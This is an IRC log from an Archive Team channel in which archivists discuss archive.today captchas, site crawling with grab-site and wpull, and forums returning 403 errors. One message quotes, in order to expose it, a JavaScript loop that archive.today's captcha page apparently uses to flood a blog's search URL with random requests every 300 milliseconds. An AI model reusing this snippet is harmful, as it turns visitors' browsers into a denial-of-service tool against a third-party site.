#archiveteam-bs log for 2026-02-04

Home Search Previous day Next day

00:00:02		sec^nd quits [Remote host closed the connection]
00:00:28		sec^nd (second) joins
00:02:52		Sk1d joins
00:04:46		Dada quits [Remote host closed the connection]
00:10:51		BornOn420 quits [Ping timeout: 272 seconds]
00:12:47		fangfufu quits [Quit: ZNC 1.9.1+deb2+b3 - https://znc.in]
00:13:18		fangfufu joins
00:13:23		fangfufu is now authenticated as fangfufu
00:14:02		sec^nd quits [Remote host closed the connection]
00:14:20		sec^nd (second) joins
00:18:17		etnguyen03 (etnguyen03) joins
00:42:20		hamouda9 quits [Client Quit]
00:49:05		Sk1d quits [Read error: Connection reset by peer]
00:49:06		etnguyen03 quits [Remote host closed the connection]
00:55:02		useretail quits [Remote host closed the connection]
00:55:41		etnguyen03 (etnguyen03) joins
00:57:52		useretail joins
00:57:57		BornOn420 (BornOn420) joins
01:18:05	<pabs>	klea: re Moin, hackily with AB, or someone could write some code to generate an !ao list https://wiki.archiveteam.org/index.php/MoinMoin#ArchiveBot
01:32:13	<pabs>	justauser: e164.arpa results https://transfer.archivete.am/8iNc3/e164.arpa-pabs-scrape.txt
01:32:13	<eggdrop>	inline (for browser viewing): https://transfer.archivete.am/inline/8iNc3/e164.arpa-pabs-scrape.txt
01:35:42	<klea>	aaa, pita
01:36:12	<@JAA>	I have a partial implementation of scripts to make it easier, need to finish those.
01:36:16	<@JAA>	Also, #wikiteam
01:37:48	<pabs>	justauser: re archive.today, do we know what triggers the captchas?
01:39:41	<Yakov>	happens everytime when trying to save a capture with no cookies/new session
01:40:32	<Yakov>	sometimes happens when searching or when going to a capture
01:42:04	<pabs>	huh, it does now. I remember not having captchas when saving before
01:43:12	<Yakov>	pretty sure it always did, just if you solved it in the past (whether it be from going to a capture or even viewing a capture previously) it might not show
01:43:44	<pabs>	hmm
01:45:09	<Yakov>	anyways they've well aware people know about the DDoS script yet they still keep it, in fact they've mutated the DDoS script since the HN post to now use Math.random instead of Date().getTime()
01:45:41	<Yakov>	https://news.ycombinator.com/item?id=46624740 <-- previous script, current script: setInterval(function(){fetch("https://gyrovague.com/?s="+Math.random().toString(36).substring(2,3+Math.random()*8),{ referrerPolicy:"no-referrer",mode:"no-cors" });},300);`
01:47:21	<pokechu22>	hmm, I didn't see the script or any network traffic when I looked for it yesterday; maybe they removed it temporarily?
01:48:54	<Yakov>	i noticed that too, however i noticed the script still in the html. then i realized ublock and most adblockers now block it as mentioned in the recent gyrovague blog post
01:49:29	<Yakov>	https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/ ctrl+f "ublock"
01:50:32	<pokechu22>	I saw that but assumed it would still show up in the developer console (as blocked). I think I also looked in the HTML and didn't see the script, but might have just missed it
01:51:07	<Yakov>	I always assumed it would be blocked and i'm confused as well however i only glimpsed over it but i know it was definitely there
01:51:13	<Yakov>	s/always/also/
01:52:33	<Yakov>	ublock might not be doing it (just) on a network level? Chromium with 0 extensions and the requests actually do go through and show up
01:55:51	<Yakov>	https://pastebin.com/X2aW7J1G this is the html for the captcha page for anyone who is curious (only thing i changed was i redacted my IP that was in an html comment from the server)
01:55:53	<@JAA>	I don't remember not seeing a captcha on URL submission (without a recent previous submission).
02:08:02	<steering>	Yakov: pastebin hid your paste
02:08:05	<steering>	pastebin--
02:08:07	<eggdrop>	[karma] 'pastebin' now has -1 karma!
02:08:24	<Yakov>	"Pending Moderation" that happened fast
02:08:31	<steering>	doxx and malware: yes
02:08:33	<steering>	html dump: no
02:09:07	<Yakov>	alternative: https://transfer.archivete.am/64GbF/archive.today%20challenge%20html.html
02:09:07	<eggdrop>	inline (for browser viewing): https://transfer.archivete.am/inline/64GbF/archive.today%20challenge%20html.html
02:10:07	<Yakov>	wait inline is actually running the html
02:10:16	<steering>	yeah it does that
02:10:29	<Yakov>	i was really concerned for a second when i noticed a fake cloudflare challenge
02:10:47	<Yakov>	lol and it's doin the requests https://img.yakov.cloud/gXuKY.png
02:12:07	<steering>	yeah i was confused by view source not working
02:12:11	<steering>	window.history.pushState('/', '', '/');
02:12:21		steering shakes fist at browsers for allowing that to break view source
02:12:37	<steering>	(or just for allowing it at all, ugh)
02:15:16	<steering>	https://transfer.archivete.am/inline/bctfb/archive.today.challenge.html uploaded as text/plain
02:15:39		steering shakes fist at transfer for not including a newline on the end of the output
02:20:39	<steering>	aaaaaaah I wish e164 was a thing
02:26:59	<pabs>	!tell egallager re that wesnoth forums post, there are a few non-404 .sf2 files on IA, found using the little-things ia-cdx-search tool https://transfer.archivete.am/cqUq9/www.freesf2.com-non-404-sf2-files.txt
02:26:59	<eggdrop>	[tell] ok, I'll tell egallager when they join next
02:28:32	<Yakov>	i really wish we could recursively archive https://www.mobileread.com/ forums, if someone can figure it out that would be great
02:29:09	<Yakov>	somehow AB got 403s on forumdisplay.php but works fine in browser? 🤷‍♂️
02:35:12	<pabs>	hmm, wget with no UA doesn't get a 403
02:37:39	<Yakov>	it was last done on job id 15ypiav9wiw4v40ktcxoy8dhk
02:38:07	<Yakov>	20:58:04 <@pokechu22> https://www.mobileread.com/forums/member.php is restricted, but it also got 403s on forumdisplay.php
02:38:39	<Yakov>	s/done/queued and aborted/
02:39:13	<pabs>	might be IP reputation, I got 200 regardless of UA with curl, using all the AB UAs
02:39:26	<Yakov>	We can try again then
03:28:41		michaelblob quits [Quit: yoop]
03:29:20		michaelblob joins
04:02:48		etnguyen03 quits [Quit: Konversation terminated!]
04:03:23		etnguyen03 (etnguyen03) joins
04:15:54		etnguyen03 quits [Remote host closed the connection]
04:19:30	<pokechu22>	OK, yeah, I can confirm archive.today still does that, and the history modification probably is part of the problem. The way archive.today handles failed jobs is annoying in general - it makes it easy to forget what the original URL was
04:19:47	<pokechu22>	and it doesn't show up in f12 at all
04:26:42		chunkynutz60 quits [Quit: The Lounge - https://thelounge.chat]
04:26:55		chunkynutz60 joins
04:45:23		Kotomind joins
04:52:58		DogsRNice quits [Read error: Connection reset by peer]
04:53:57		sec^nd quits [Remote host closed the connection]
04:54:30		sec^nd (second) joins
05:03:27		SootBector quits [Remote host closed the connection]
05:04:26		SootBector (SootBector) joins
05:04:46		n9nes quits [Ping timeout: 256 seconds]
05:05:13		n9nes joins
05:58:31		Island quits [Read error: Connection reset by peer]
06:03:37		chunkynutz60 quits [Ping timeout: 272 seconds]
06:09:05		nexussfan quits [Quit: Konversation terminated!]
06:22:28		ArchivalEfforts quits [Quit: https://quassel-irc.org - Chat comfortably. Anywhere.]
06:23:39		ArchivalEfforts joins
06:34:35		Sluggs quits [Excess Flood]
06:39:35		chunkynutz60 joins
06:39:44		Sluggs (Sluggs) joins
06:43:14		Guest quits [Read error: Connection reset by peer]
06:43:16		Guest joins
06:43:22		midou quits [Ping timeout: 256 seconds]
06:50:14		barry quits [Remote host closed the connection]
06:50:50		barry joins
06:51:32		sec^nd quits [Remote host closed the connection]
06:52:02		sec^nd (second) joins
07:16:08		flotwig quits [Read error: Connection reset by peer]
07:16:21		flotwig joins
07:24:04		sec^nd quits [Ping timeout: 256 seconds]
07:27:58		sec^nd (second) joins
07:36:18		Washuu quits [Quit: Ooops, wrong browser tab.]
08:35:09		sec^nd quits [Remote host closed the connection]
08:35:35		sec^nd (second) joins
09:34:31		nathang2184 quits [Ping timeout: 272 seconds]
09:38:49		midou joins
09:40:43		nathang2184 joins
09:45:21		twiswist_ quits [Read error: Connection reset by peer]
09:45:35		twiswist_ (twiswist) joins
10:21:15		oxtyped quits [Read error: Connection reset by peer]
10:28:20		oxtyped joins
10:29:32	<triplecamera\|m>	I've been tinkering with grab-site these days. I'd like to archive <https://pdos.csail.mit.edu/6.828/{2003..2025}/>, which is served by Apache.
10:30:50	<triplecamera\|m>	Apache has a feature: When you access a directory without the index file, Apache lists all files under that directory. This enables the discovery of hidden files (files without links pointing to them).
10:32:17	<triplecamera\|m>	I hope that whenever wpull visits a page, it automatically pushes its parent directory into the queue. Is this possible to achieve?
11:09:08		oxtyped quits [Ping timeout: 256 seconds]
11:37:00		ichdasich quits [Remote host closed the connection]
11:40:26		oxtyped joins
12:00:03		Bleo182600722719623455222 quits [Quit: The Lounge - https://thelounge.chat]
12:02:52		Bleo182600722719623455222 joins
12:10:53		APOLLO03 quits [Quit: .]
12:13:11		APOLLO03 joins
12:18:23		Washuu joins
12:24:31		Dada joins
13:00:23		marcmarcos joins
13:09:45	<justauser>	pabs: I think everything interesting is on our wiki. Always on save, "bad" IPs get it on the first request, lasts for 5 minutes.
13:09:46	<justauser>	triplecamera\|m: grab-site/AB won't climb up the directories on their own; this had to be implemented separately during SFDW project.
13:18:20		Arcorann__ quits [Ping timeout: 256 seconds]
13:24:25		marcmarcos quits [Ping timeout: 272 seconds]
13:30:32	<cruller>	You can climb the directories by executing `grab-site --which-wpull-command` and removing `--no-parent` from the output. However, I don't think this is what triplecamera wants to do.
13:32:10		PC quits [Remote host closed the connection]
13:32:23		PC (PC) joins
13:40:58	<cruller>	Moreover, with this method, all URLs sharing the same FQDN as the seeds end up within the scope, IIUC.
13:44:54	<masterx244\|m>	i wonder if a ignore could be abused to ignore anything that is not under the /6.828 top level folder
13:45:40	<cruller>	--hostnames or similar option restricts the scope, but this also affects requisites.
13:48:18	<masterx244\|m>	5 regexes should be enough to exclude anything outside of the folder. .edu/[^6] .edu/6[^.] .edu/6.[^8] and so on until where the urls divert
13:48:50	<masterx244\|m>	requisites need a run through the database on ignored urls and then a --1 to fetch them without recursion
13:49:10	<justauser>	grab-site doesn't keep a DB of ignored URLs IIRC.
13:49:32	<masterx244\|m>	it does :P, its inside wpull database
13:50:03	<masterx244\|m>	i absued that back for the imgur hunting, crawl site and have a ignore matching everything except the target domain, afterwards wpull db to urllist and then grep
13:58:23		marcmarcos joins
14:01:36	<marcmarcos>	exit
14:01:44		marcmarcos quits [Client Quit]
14:16:59		lukash984 quits [Ping timeout: 272 seconds]
14:28:01	<cruller>	In any case, unless "Index of" pages are linked from regular pages, it's difficult to automatically push them into the queue, right?
14:29:56		lukash984 joins
14:30:08	<justauser>	Not that hard, but needs a custom script. SFDW had one.
14:30:33	<cruller>	You might be able to do it using “--plugin-script”. But rather than that, I think it's easier to manually create a URL list from a 1st crawl and then perform a 2nd crawl.
14:30:54	<cruller>	ah yes, custom script.
14:36:24	<cruller>	BTW, in general, URLs that are in-scope but require out-of-scope resources for discovery are very troublesome.
14:38:57		Island joins
14:42:28	<cruller>	I have no choice but to give up on orphan urls, but it's frustrating to miss urls that could be found depending on crawling rules.
14:48:01		oxtyped quits [Ping timeout: 272 seconds]
14:51:11		Kotomind quits [Ping timeout: 272 seconds]
14:56:33	<h2ibot>	Justauser edited Uncyclopedia (+621, Added dump links): https://wiki.archiveteam.org/?diff=60413&oldid=59310
14:57:58		oxtyped joins
14:58:52	<masterx244\|m>	koichi: like said: 2-stage crawl first one to get all folders that are known and then pulling the folder indexes and then processing the indexes to check if there are more URLs hidden
15:00:42	<jodizzle>	"Washington Post to make ‘significant’ cuts": https://www.semafor.com/article/02/04/2026/washington-post-to-make-significant-cuts
15:01:22	<jodizzle>	I imagine the Washington Post is thoroughly archived in several places, but just FYI.
15:19:54		petrichor quits [Quit: ZNC 1.10.1 - https://znc.in]
15:41:18		DogsRNice joins
16:05:38	<pabs>	pokechu22: re failed archive.today jobs, I found today that in firefox at least that hovering over the tab gives you a truncated original URL and typing that into the URL bar gets you the full URL from history
16:06:50		Ryz2 quits [Quit: Ping timeout (120 seconds)]
16:07:01		Ryz2 (Ryz) joins
16:07:39	<pabs>	jodizzle: I think WaPo is pretty hard to archive, ISTR AB gets errors
16:10:39		petrichor (petrichor) joins
16:38:15		Guest58 quits [Quit: Textual IRC Client: www.textualapp.com]
16:45:57		Washuu quits [Quit: Ooops, wrong browser tab.]
17:40:42		crullerIRC quits [Ping timeout: 256 seconds]
17:41:56		crullerIRC joins
17:46:48		cyanbox_ joins
17:47:14		cyanbox_ quits [Read error: Connection reset by peer]
17:49:47		cyanbox quits [Ping timeout: 272 seconds]
17:57:31		Juest quits [Read error: Connection reset by peer]
18:00:56		Juest (Juest) joins
18:17:59	<h2ibot>	Manu edited Distributed recursive crawls (+69, Candidates: Add www.defence.go.ug): https://wiki.archiveteam.org/?diff=60414&oldid=60181
18:27:08		michaelblob quits [Quit: yoop]
18:30:12		michaelblob joins
18:32:36		Sk1d joins
18:39:44		nine quits [Quit: See ya!]
18:39:57		nine joins
18:39:57		nine is now authenticated as nine
18:39:57		nine quits [Changing host]
18:39:57		nine (nine) joins
18:43:03	<h2ibot>	Manu edited Discourse/archived (+89, Queued https://chiahpa.be/): https://wiki.archiveteam.org/?diff=60415&oldid=60387
18:44:03	<h2ibot>	Manu edited Discourse/archived (+103, pokechu22 queued discussions.scouting.org): https://wiki.archiveteam.org/?diff=60416&oldid=60415
18:46:03	<h2ibot>	Manu edited Discourse/archived (+96, Queued discuss.ipfs.tech): https://wiki.archiveteam.org/?diff=60417&oldid=60416
18:49:04	<h2ibot>	Manu edited Discourse/archived (+100, Queued forums.rockylinux.org): https://wiki.archiveteam.org/?diff=60418&oldid=60417
18:51:04	<h2ibot>	Manu edited Discourse/archived (+89, Queued ziggit.dev): https://wiki.archiveteam.org/?diff=60419&oldid=60418
18:53:45		Kabaya quits [Ping timeout: 272 seconds]
19:01:59		Sk1d quits [Ping timeout: 272 seconds]
19:12:10		iPwnedYourIOTSmartdog quits [Quit: Ping timeout (120 seconds)]
19:12:30		iPwnedYourIOTSmartdog joins
19:51:21		Wohlstand (Wohlstand) joins
19:59:52		Wohlstand quits [Client Quit]
20:13:24		ThreeHM quits [Quit: WeeChat 4.8.0]
20:14:31		ThreeHM (ThreeHeadedMonkey) joins
20:17:40		fetcher quits [Ping timeout: 256 seconds]
20:23:06		fetcher joins
20:39:41		lukash984 quits [Quit: The Lounge - https://thelounge.chat]
20:41:14		lukash984 joins
21:35:00		Sk1d joins
21:42:13		fetcher quits [Ping timeout: 272 seconds]
21:43:38		fetcher joins
22:01:22		fetcher quits [Ping timeout: 256 seconds]
22:06:42		fetcher joins
22:17:32		flotwig quits [Quit: ZNC - http://znc.in]
22:19:43		flotwig joins
22:21:29		fetcher quits [Ping timeout: 272 seconds]
22:23:10		fetcher joins
22:30:22		Arcorann__ joins
22:38:41		flotwig quits [Client Quit]
22:48:43		n9nes quits [Ping timeout: 272 seconds]
22:49:50		n9nes joins
22:58:02		flotwig joins
23:01:51		flotwig quits [Client Quit]
23:02:09		Dada quits [Remote host closed the connection]
23:08:06		flotwig joins
23:11:51		flotwig quits [Client Quit]
23:15:34		flotwig joins
23:16:32		nexussfan (nexussfan) joins
23:38:25		Arcorann__ quits [Read error: Connection reset by peer]
23:39:28		Arcorann joins
23:49:02		Sk1d quits [Ping timeout: 256 seconds]

Home Search Previous day Next day